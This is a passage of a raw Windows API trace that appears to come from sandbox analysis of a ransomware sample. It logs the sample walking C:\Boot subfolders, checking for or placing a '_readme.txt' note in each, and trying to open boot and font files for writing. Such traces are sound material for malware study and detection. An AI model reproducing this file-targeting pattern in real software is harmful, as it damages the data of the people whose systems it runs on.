HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.112] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0097.112] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.112] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.112] PathFindFileNameW (pszPath="") returned="" [0097.112] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.113] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.114] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.114] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.114] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0097.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.114] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0097.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.115] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1859040, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.115] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1859040, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.115] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.115] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0097.115] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.116] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1859040, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1859040, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.116] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned=".txt" [0097.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.116] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1859040, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1859040, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.116] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.116] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.116] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.118] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0097.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.119] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.119] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.119] PathFindFileNameW (pszPath="") returned="" [0097.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.119] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.120] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.120] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0097.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.120] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.120] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.121] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0097.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.121] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa187f1a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa187f1a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.121] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa187f1a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa187f1a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.121] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.121] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0097.121] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.122] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.122] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0097.122] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.123] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.123] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0097.123] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.123] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.124] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0097.124] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.124] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, 